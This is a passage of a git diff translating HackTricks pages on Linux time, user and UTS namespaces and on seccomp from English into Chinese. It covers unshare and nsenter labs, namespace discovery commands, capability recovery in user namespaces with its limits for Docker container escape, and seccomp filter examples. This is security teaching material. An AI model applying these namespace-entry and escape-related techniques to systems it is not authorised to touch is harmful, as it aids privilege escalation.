**特定于该命名空间的进程信息的准确和隔离的视图**。
-Error: bash: fork: Cannot allocate memory +错误:bash: fork: 无法分配内存 -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +当 `unshare` 在没有 `-f` 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: -1. **Problem Explanation**: +1. **问题说明**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +- Linux 内核允许进程使用 `unshare` 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 "unshare" 进程)并不会进入新的命名空间;只有它的子进程会进入。 +- 运行 `%unshare -p /bin/bash%` 会在与 `unshare` 相同的进程中启动 `/bin/bash`。因此,`/bin/bash` 及其子进程位于原始 PID 命名空间中。 +- 新命名空间中 `/bin/bash` 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 -2. **Consequence**: +2. **后果**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +- 新命名空间中 PID 1 的退出导致 `PIDNS_HASH_ADDING` 标志的清理。这导致 `alloc_pid` 函数在创建新进程时无法分配新的 PID,从而产生 "无法分配内存" 错误。 -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **解决方案**: +- 通过在 `unshare` 中使用 `-f` 选项可以解决此问题。此选项使 `unshare` 在创建新的 PID 命名空间后分叉一个新进程。 +- 执行 `%unshare -fp /bin/bash%` 确保 `unshare` 命令本身在新命名空间中成为 PID 1。然后,`/bin/bash` 及其子进程安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +通过确保 `unshare` 以 `-f` 标志运行,新的 PID 命名空间得以正确维护,使得 `/bin/bash` 及其子进程能够正常运行,而不会遇到内存分配错误。
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` - -### Check which namespace is your process in - +### 检查您的进程所在的命名空间 ```bash ls -l /proc/self/ns/time lrwxrwxrwx 1 root root 0 Apr 4 21:16 /proc/self/ns/time -> 'time:[4026531834]' ``` - -### Find all Time namespaces - +### 查找所有时间命名空间 ```bash sudo find /proc -maxdepth 3 -type l -name time -exec readlink {} \; 2>/dev/null | sort -u # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name time -exec ls -l {} \; 2>/dev/null | grep ``` - -### Enter inside a Time namespace - +### 进入时间命名空间 ```bash nsenter -T TARGET_PID --pid /bin/bash ``` - {{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md index 88d39ccc6..1a1ee2916 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md @@ -1,103 +1,88 @@ -# User Namespace +# 用户命名空间 {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -A user namespace is a Linux kernel feature that **provides isolation of user and group ID mappings**, allowing each user namespace to have its **own set of user and group IDs**. This isolation enables processes running in different user namespaces to **have different privileges and ownership**, even if they share the same user and group IDs numerically. +用户命名空间是一个Linux内核特性,**提供用户和组ID映射的隔离**,允许每个用户命名空间拥有**自己的一组用户和组ID**。这种隔离使得在不同用户命名空间中运行的进程**可以拥有不同的权限和所有权**,即使它们在数字上共享相同的用户和组ID。 -User namespaces are particularly useful in containerization, where each container should have its own independent set of user and group IDs, allowing for better security and isolation between containers and the host system. +用户命名空间在容器化中特别有用,每个容器应该拥有自己独立的一组用户和组ID,从而在容器与主机系统之间提供更好的安全性和隔离。 -### How it works: +### 工作原理: -1. When a new user namespace is created, it **starts with an empty set of user and group ID mappings**. This means that any process running in the new user namespace will **initially have no privileges outside of the namespace**. -2. ID mappings can be established between the user and group IDs in the new namespace and those in the parent (or host) namespace. This **allows processes in the new namespace to have privileges and ownership corresponding to user and group IDs in the parent namespace**. However, the ID mappings can be restricted to specific ranges and subsets of IDs, allowing for fine-grained control over the privileges granted to processes in the new namespace. -3. Within a user namespace, **processes can have full root privileges (UID 0) for operations inside the namespace**, while still having limited privileges outside the namespace. This allows **containers to run with root-like capabilities within their own namespace without having full root privileges on the host system**. -4. Processes can move between namespaces using the `setns()` system call or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWUSER` flag. When a process moves to a new namespace or creates one, it will start using the user and group ID mappings associated with that namespace. +1. 当创建一个新的用户命名空间时,它**以一个空的用户和组ID映射集开始**。这意味着在新的用户命名空间中运行的任何进程**最初在命名空间外没有权限**。 +2. 可以在新命名空间中的用户和组ID与父(或主机)命名空间中的ID之间建立ID映射。这**允许新命名空间中的进程拥有与父命名空间中的用户和组ID相对应的权限和所有权**。然而,ID映射可以限制在特定范围和ID子集内,从而对新命名空间中进程所授予的权限进行细粒度控制。 +3. 在用户命名空间内,**进程可以对命名空间内的操作拥有完全的root权限(UID 0)**,同时在命名空间外仍然拥有有限的权限。这允许**容器在其自己的命名空间内以类似root的能力运行,而不在主机系统上拥有完全的root权限**。 +4. 进程可以使用`setns()`系统调用在命名空间之间移动,或使用带有`CLONE_NEWUSER`标志的`unshare()`或`clone()`系统调用创建新的命名空间。当进程移动到新命名空间或创建一个新命名空间时,它将开始使用与该命名空间关联的用户和组ID映射。 -## Lab: +## 实验: -### Create different Namespaces +### 创建不同的命名空间 #### CLI - ```bash sudo unshare -U [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +通过挂载新的 `/proc` 文件系统,如果使用参数 `--mount-proc`,您可以确保新的挂载命名空间具有 **特定于该命名空间的进程信息的准确和隔离的视图**。
-Error: bash: fork: Cannot allocate memory +错误:bash: fork: 无法分配内存 -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +当 `unshare` 在没有 `-f` 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: -1. **Problem Explanation**: +1. **问题说明**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +- Linux 内核允许进程使用 `unshare` 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 "unshare" 进程)并不会进入新的命名空间;只有它的子进程会进入。 +- 运行 `%unshare -p /bin/bash%` 会在与 `unshare` 相同的进程中启动 `/bin/bash`。因此,`/bin/bash` 及其子进程位于原始 PID 命名空间中。 +- 新命名空间中 `/bin/bash` 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 -2. **Consequence**: +2. **后果**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +- 新命名空间中 PID 1 的退出导致 `PIDNS_HASH_ADDING` 标志的清理。这导致 `alloc_pid` 函数在创建新进程时无法分配新的 PID,从而产生 "无法分配内存" 的错误。 -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **解决方案**: +- 通过在 `unshare` 中使用 `-f` 选项可以解决此问题。此选项使 `unshare` 在创建新的 PID 命名空间后分叉一个新进程。 +- 执行 `%unshare -fp /bin/bash%` 确保 `unshare` 命令本身在新命名空间中成为 PID 1。然后,`/bin/bash` 及其子进程安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +通过确保 `unshare` 以 `-f` 标志运行,新的 PID 命名空间得以正确维护,使得 `/bin/bash` 及其子进程能够正常运行,而不会遇到内存分配错误。
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +要使用用户命名空间,Docker 守护进程需要使用 **`--userns-remap=default`** 启动(在 Ubuntu 14.04 中,可以通过修改 `/etc/default/docker` 然后执行 `sudo service docker restart` 来完成) -To use user namespace, Docker daemon needs to be started with **`--userns-remap=default`**(In ubuntu 14.04, this can be done by modifying `/etc/default/docker` and then executing `sudo service docker restart`) - -### Check which namespace is your process in - +### 检查您的进程在哪个命名空间中 ```bash ls -l /proc/self/ns/user lrwxrwxrwx 1 root root 0 Apr 4 20:57 /proc/self/ns/user -> 'user:[4026531837]' ``` - -It's possible to check the user map from the docker container with: - +可以通过以下命令检查 Docker 容器中的用户映射: ```bash cat /proc/self/uid_map - 0 0 4294967295 --> Root is root in host - 0 231072 65536 --> Root is 231072 userid in host +0 0 4294967295 --> Root is root in host +0 231072 65536 --> Root is 231072 userid in host ``` - -Or from the host with: - +或从主机使用: ```bash cat /proc//uid_map ``` - -### Find all User namespaces - +### 查找所有用户命名空间 ```bash sudo find /proc -maxdepth 3 -type l -name user -exec readlink {} \; 2>/dev/null | sort -u # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name user -exec ls -l {} \; 2>/dev/null | grep ``` - -### Enter inside a User namespace - +### 进入用户命名空间 ```bash nsenter -U TARGET_PID --pid /bin/bash ``` +此外,您只能**以 root 身份进入另一个进程命名空间**。并且您**不能**在没有指向它的**描述符**的情况下**进入**其他命名空间(例如 `/proc/self/ns/user`)。 -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/user`). - -### Create new User namespace (with mappings) - +### 创建新的用户命名空间(带映射) ```bash unshare -U [--map-user=|] [--map-group=|] [--map-root-user] [--map-current-user] ``` @@ -111,16 +96,14 @@ nobody@ip-172-31-28-169:/home/ubuntu$ #Check how the user is nobody ps -ef | grep bash # The user inside the host is still root, not nobody root 27756 27755 0 21:11 pts/10 00:00:00 /bin/bash ``` +### 恢复能力 -### Recovering Capabilities +在用户命名空间的情况下,**当创建一个新的用户命名空间时,进入该命名空间的进程会被授予该命名空间内的完整能力集**。这些能力允许进程执行特权操作,例如**挂载** **文件系统**、创建设备或更改文件的所有权,但**仅在其用户命名空间的上下文中**。 -In the case of user namespaces, **when a new user namespace is created, the process that enters the namespace is granted a full set of capabilities within that namespace**. These capabilities allow the process to perform privileged operations such as **mounting** **filesystems**, creating devices, or changing ownership of files, but **only within the context of its user namespace**. - -For example, when you have the `CAP_SYS_ADMIN` capability within a user namespace, you can perform operations that typically require this capability, like mounting filesystems, but only within the context of your user namespace. Any operations you perform with this capability won't affect the host system or other namespaces. +例如,当你在用户命名空间内拥有 `CAP_SYS_ADMIN` 能力时,你可以执行通常需要此能力的操作,如挂载文件系统,但仅在你的用户命名空间的上下文中。你使用此能力执行的任何操作都不会影响主机系统或其他命名空间。 > [!WARNING] -> Therefore, even if getting a new process inside a new User namespace **will give you all the capabilities back** (CapEff: 000001ffffffffff), you actually can **only use the ones related to the namespace** (mount for example) but not every one. So, this on its own is not enough to escape from a Docker container. - +> 因此,即使在新的用户命名空间内获取一个新进程**会让你恢复所有能力**(CapEff: 000001ffffffffff),你实际上**只能使用与命名空间相关的能力**(例如挂载),而不是每一个。因此,仅凭这一点不足以逃离 Docker 容器。 ```bash # There are the syscalls that are filtered after changing User namespace with: unshare -UmCpf bash @@ -144,5 +127,4 @@ Probando: 0x139 . . . Error Probando: 0x140 . . . Error Probando: 0x141 . . . Error ``` - {{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md index 62b92742a..867bd82d3 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md @@ -2,77 +2,67 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -A UTS (UNIX Time-Sharing System) namespace is a Linux kernel feature that provides i**solation of two system identifiers**: the **hostname** and the **NIS** (Network Information Service) domain name. This isolation allows each UTS namespace to have its **own independent hostname and NIS domain name**, which is particularly useful in containerization scenarios where each container should appear as a separate system with its own hostname. +UTS(UNIX时间共享系统)命名空间是一个Linux内核特性,提供了**两个系统标识符的隔离**:**主机名**和**NIS**(网络信息服务)域名。这种隔离允许每个UTS命名空间拥有**自己的独立主机名和NIS域名**,这在容器化场景中特别有用,因为每个容器应该看起来像一个具有自己主机名的独立系统。 -### How it works: +### 工作原理: -1. When a new UTS namespace is created, it starts with a **copy of the hostname and NIS domain name from its parent namespace**. This means that, at creation, the new namespace s**hares the same identifiers as its parent**. However, any subsequent changes to the hostname or NIS domain name within the namespace will not affect other namespaces. -2. Processes within a UTS namespace **can change the hostname and NIS domain name** using the `sethostname()` and `setdomainname()` system calls, respectively. These changes are local to the namespace and do not affect other namespaces or the host system. -3. Processes can move between namespaces using the `setns()` system call or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWUTS` flag. When a process moves to a new namespace or creates one, it will start using the hostname and NIS domain name associated with that namespace. +1. 当创建一个新的UTS命名空间时,它会以**从其父命名空间复制的主机名和NIS域名**开始。这意味着在创建时,新的命名空间**共享与其父命名空间相同的标识符**。然而,在命名空间内对主机名或NIS域名的任何后续更改将不会影响其他命名空间。 +2. UTS命名空间内的进程**可以使用`sethostname()`和`setdomainname()`系统调用分别更改主机名和NIS域名**。这些更改是本地的,不会影响其他命名空间或主机系统。 +3. 进程可以使用`setns()`系统调用在命名空间之间移动,或使用带有`CLONE_NEWUTS`标志的`unshare()`或`clone()`系统调用创建新的命名空间。当进程移动到新的命名空间或创建一个时,它将开始使用与该命名空间关联的主机名和NIS域名。 -## Lab: +## 实验: -### Create different Namespaces +### 创建不同的命名空间 #### CLI - ```bash sudo unshare -u [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +通过挂载新的 `/proc` 文件系统,如果使用参数 `--mount-proc`,您可以确保新的挂载命名空间具有 **特定于该命名空间的进程信息的准确和隔离的视图**。
-Error: bash: fork: Cannot allocate memory +错误:bash: fork: 无法分配内存 -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +当 `unshare` 在没有 `-f` 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: -1. **Problem Explanation**: +1. **问题解释**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +- Linux 内核允许进程使用 `unshare` 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 "unshare" 进程)并不会进入新的命名空间;只有它的子进程会进入。 +- 运行 `%unshare -p /bin/bash%` 会在与 `unshare` 相同的进程中启动 `/bin/bash`。因此,`/bin/bash` 及其子进程位于原始 PID 命名空间中。 +- 新命名空间中 `/bin/bash` 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 -2. **Consequence**: +2. **后果**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +- 新命名空间中 PID 1 的退出导致 `PIDNS_HASH_ADDING` 标志的清理。这导致 `alloc_pid` 函数在创建新进程时无法分配新的 PID,从而产生 "无法分配内存" 的错误。 -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **解决方案**: +- 通过在 `unshare` 中使用 `-f` 选项可以解决此问题。此选项使 `unshare` 在创建新的 PID 命名空间后分叉一个新进程。 +- 执行 `%unshare -fp /bin/bash%` 确保 `unshare` 命令本身在新命名空间中成为 PID 1。`/bin/bash` 及其子进程随后安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +通过确保 `unshare` 以 `-f` 标志运行,新的 PID 命名空间得以正确维护,使得 `/bin/bash` 及其子进程能够正常运行而不会遇到内存分配错误。
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` - -### Check which namespace is your process in - +### 检查您的进程所在的命名空间 ```bash ls -l /proc/self/ns/uts lrwxrwxrwx 1 root root 0 Apr 4 20:49 /proc/self/ns/uts -> 'uts:[4026531838]' ``` - -### Find all UTS namespaces - +### 查找所有 UTS 命名空间 ```bash sudo find /proc -maxdepth 3 -type l -name uts -exec readlink {} \; 2>/dev/null | sort -u # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name uts -exec ls -l {} \; 2>/dev/null | grep ``` - -### Enter inside an UTS namespace - +### 进入 UTS 命名空间 ```bash nsenter -u TARGET_PID --pid /bin/bash ``` - {{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/seccomp.md b/src/linux-hardening/privilege-escalation/docker-security/seccomp.md index 17ec393d2..dffadbd2c 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/seccomp.md +++ b/src/linux-hardening/privilege-escalation/docker-security/seccomp.md @@ -2,18 +2,17 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -**Seccomp**, standing for Secure Computing mode, is a security feature of the **Linux kernel designed to filter system calls**. It restricts processes to a limited set of system calls (`exit()`, `sigreturn()`, `read()`, and `write()` for already-open file descriptors). If a process tries to call anything else, it gets terminated by the kernel using SIGKILL or SIGSYS. This mechanism doesn't virtualize resources but isolates the process from them. +**Seccomp**,即安全计算模式,是**Linux内核的一个安全特性,用于过滤系统调用**。它将进程限制在一组有限的系统调用中(`exit()`、`sigreturn()`、`read()`和`write()`,仅适用于已打开的文件描述符)。如果进程尝试调用其他任何内容,内核将使用SIGKILL或SIGSYS终止该进程。该机制并不虚拟化资源,而是将进程与资源隔离。 -There are two ways to activate seccomp: through the `prctl(2)` system call with `PR_SET_SECCOMP`, or for Linux kernels 3.17 and above, the `seccomp(2)` system call. The older method of enabling seccomp by writing to `/proc/self/seccomp` has been deprecated in favor of `prctl()`. +激活seccomp有两种方法:通过`prctl(2)`系统调用与`PR_SET_SECCOMP`,或者对于3.17及以上版本的Linux内核,使用`seccomp(2)`系统调用。通过写入`/proc/self/seccomp`来启用seccomp的旧方法已被弃用,取而代之的是`prctl()`。 -An enhancement, **seccomp-bpf**, adds the capability to filter system calls with a customizable policy, using Berkeley Packet Filter (BPF) rules. This extension is leveraged by software such as OpenSSH, vsftpd, and the Chrome/Chromium browsers on Chrome OS and Linux for flexible and efficient syscall filtering, offering an alternative to the now unsupported systrace for Linux. +一个增强功能,**seccomp-bpf**,增加了使用可自定义策略过滤系统调用的能力,使用伯克利数据包过滤器(BPF)规则。该扩展被OpenSSH、vsftpd以及Chrome OS和Linux上的Chrome/Chromium浏览器等软件利用,以实现灵活高效的系统调用过滤,提供了对现在不再支持的Linux systrace的替代方案。 -### **Original/Strict Mode** - -In this mode Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL +### **原始/严格模式** +在此模式下,Seccomp **仅允许系统调用** `exit()`、`sigreturn()`、`read()`和`write()`,仅适用于已打开的文件描述符。如果进行任何其他系统调用,进程将被SIGKILL终止。 ```c:seccomp_strict.c #include #include @@ -27,29 +26,27 @@ In this mode Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read( int main(int argc, char **argv) { - int output = open("output.txt", O_WRONLY); - const char *val = "test"; +int output = open("output.txt", O_WRONLY); +const char *val = "test"; - //enables strict seccomp mode - printf("Calling prctl() to set seccomp strict mode...\n"); - prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); +//enables strict seccomp mode +printf("Calling prctl() to set seccomp strict mode...\n"); +prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); - //This is allowed as the file was already opened - printf("Writing to an already open file...\n"); - write(output, val, strlen(val)+1); +//This is allowed as the file was already opened +printf("Writing to an already open file...\n"); +write(output, val, strlen(val)+1); - //This isn't allowed - printf("Trying to open file for reading...\n"); - int input = open("output.txt", O_RDONLY); +//This isn't allowed +printf("Trying to open file for reading...\n"); +int input = open("output.txt", O_RDONLY); - printf("You will not see this message--the process will be killed first\n"); +printf("You will not see this message--the process will be killed first\n"); } ``` - ### Seccomp-bpf -This mode allows **filtering of system calls using a configurable policy** implemented using Berkeley Packet Filter rules. - +此模式允许**使用可配置策略过滤系统调用**,该策略使用伯克利数据包过滤器规则实现。 ```c:seccomp_bpf.c #include #include @@ -60,99 +57,88 @@ This mode allows **filtering of system calls using a configurable policy** imple //gcc seccomp_bpf.c -o seccomp_bpf -lseccomp void main(void) { - /* initialize the libseccomp context */ - scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); +/* initialize the libseccomp context */ +scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); - /* allow exiting */ - printf("Adding rule : Allow exit_group\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); +/* allow exiting */ +printf("Adding rule : Allow exit_group\n"); +seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); - /* allow getting the current pid */ - //printf("Adding rule : Allow getpid\n"); - //seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); +/* allow getting the current pid */ +//printf("Adding rule : Allow getpid\n"); +//seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); - printf("Adding rule : Deny getpid\n"); - seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(getpid), 0); - /* allow changing data segment size, as required by glibc */ - printf("Adding rule : Allow brk\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); +printf("Adding rule : Deny getpid\n"); +seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(getpid), 0); +/* allow changing data segment size, as required by glibc */ +printf("Adding rule : Allow brk\n"); +seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); - /* allow writing up to 512 bytes to fd 1 */ - printf("Adding rule : Allow write upto 512 bytes to FD 1\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2, - SCMP_A0(SCMP_CMP_EQ, 1), - SCMP_A2(SCMP_CMP_LE, 512)); +/* allow writing up to 512 bytes to fd 1 */ +printf("Adding rule : Allow write upto 512 bytes to FD 1\n"); +seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2, +SCMP_A0(SCMP_CMP_EQ, 1), +SCMP_A2(SCMP_CMP_LE, 512)); - /* if writing to any other fd, return -EBADF */ - printf("Adding rule : Deny write to any FD except 1 \n"); - seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1, - SCMP_A0(SCMP_CMP_NE, 1)); +/* if writing to any other fd, return -EBADF */ +printf("Adding rule : Deny write to any FD except 1 \n"); +seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1, +SCMP_A0(SCMP_CMP_NE, 1)); - /* load and enforce the filters */ - printf("Load rules and enforce \n"); - seccomp_load(ctx); - seccomp_release(ctx); - //Get the getpid is denied, a weird number will be returned like - //this process is -9 - printf("this process is %d\n", getpid()); +/* load and enforce the filters */ +printf("Load rules and enforce \n"); +seccomp_load(ctx); +seccomp_release(ctx); +//Get the getpid is denied, a weird number will be returned like +//this process is -9 +printf("this process is %d\n", getpid()); } ``` - ## Seccomp in Docker -**Seccomp-bpf** is supported by **Docker** to restrict the **syscalls** from the containers effectively decreasing the surface area. You can find the **syscalls blocked** by **default** in [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) and the **default seccomp profile** can be found here [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json).\ -You can run a docker container with a **different seccomp** policy with: - +**Seccomp-bpf** 被 **Docker** 支持,以有效限制来自容器的 **syscalls**,从而减少攻击面。您可以在 [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) 找到 **默认** 被 **阻止的 syscalls**,而 **默认 seccomp 配置文件** 可以在这里找到 [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json)。\ +您可以使用以下命令运行具有 **不同 seccomp** 策略的 docker 容器: ```bash docker run --rm \ - -it \ - --security-opt seccomp=/path/to/seccomp/profile.json \ - hello-world +-it \ +--security-opt seccomp=/path/to/seccomp/profile.json \ +hello-world ``` - -If you want for example to **forbid** a container of executing some **syscall** like `uname` you could download the default profile from [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) and just **remove the `uname` string from the list**.\ -If you want to make sure that **some binary doesn't work inside a a docker container** you could use strace to list the syscalls the binary is using and then forbid them.\ -In the following example the **syscalls** of `uname` are discovered: - +如果你想例如**禁止**一个容器执行某些**syscall**,像`uname`,你可以从[https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json)下载默认配置文件,然后**从列表中移除`uname`字符串**。\ +如果你想确保**某个二进制文件在docker容器内无法工作**,你可以使用strace列出该二进制文件使用的syscalls,然后禁止它们。\ +在以下示例中,发现了`uname`的**syscalls**: ```bash docker run -it --security-opt seccomp=default.json modified-ubuntu strace uname ``` - > [!NOTE] -> If you are using **Docker just to launch an application**, you can **profile** it with **`strace`** and **just allow the syscalls** it needs +> 如果您仅仅是使用 **Docker 启动一个应用程序**,您可以使用 **`strace`** 对其进行 **分析**,并 **仅允许** 它所需的系统调用 -### Example Seccomp policy +### 示例 Seccomp 策略 [Example from here](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/) -To illustrate Seccomp feature, let’s create a Seccomp profile disabling “chmod” system call as below. - +为了说明 Seccomp 功能,让我们创建一个 Seccomp 配置文件,禁用“chmod”系统调用,如下所示。 ```json { - "defaultAction": "SCMP_ACT_ALLOW", - "syscalls": [ - { - "name": "chmod", - "action": "SCMP_ACT_ERRNO" - } - ] +"defaultAction": "SCMP_ACT_ALLOW", +"syscalls": [ +{ +"name": "chmod", +"action": "SCMP_ACT_ERRNO" +} +] } ``` - -In the above profile, we have set default action to “allow” and created a black list to disable “chmod”. To be more secure, we can set default action to drop and create a white list to selectively enable system calls.\ -Following output shows the “chmod” call returning error because its disabled in the seccomp profile - +在上述配置中,我们将默认操作设置为“允许”,并创建了一个黑名单以禁用“chmod”。为了更安全,我们可以将默认操作设置为丢弃,并创建一个白名单以选择性地启用系统调用。\ +以下输出显示“chmod”调用返回错误,因为它在seccomp配置中被禁用。 ```bash $ docker run --rm -it --security-opt 